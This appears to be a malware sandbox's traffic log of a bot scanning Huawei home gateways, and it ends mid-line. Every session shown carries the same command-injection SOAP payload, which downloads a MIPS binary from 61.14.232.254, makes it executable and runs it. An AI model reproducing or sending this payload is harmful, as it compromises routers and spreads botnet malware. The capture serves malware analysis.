                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2450192.168.2.1343204157.29.80.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804939032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2451192.168.2.1334594157.27.145.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804956913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2452192.168.2.1347170197.17.225.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804974079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2453192.168.2.1357884157.34.101.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.806288958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2454192.168.2.134002641.7.228.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.806312084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2455192.168.2.1346428197.193.184.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.806808949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2456192.168.2.135405841.132.83.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.806943893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2457192.168.2.1344834209.194.99.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807060003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2458192.168.2.1359768197.185.70.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807204008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2459192.168.2.135323441.59.192.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807204008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 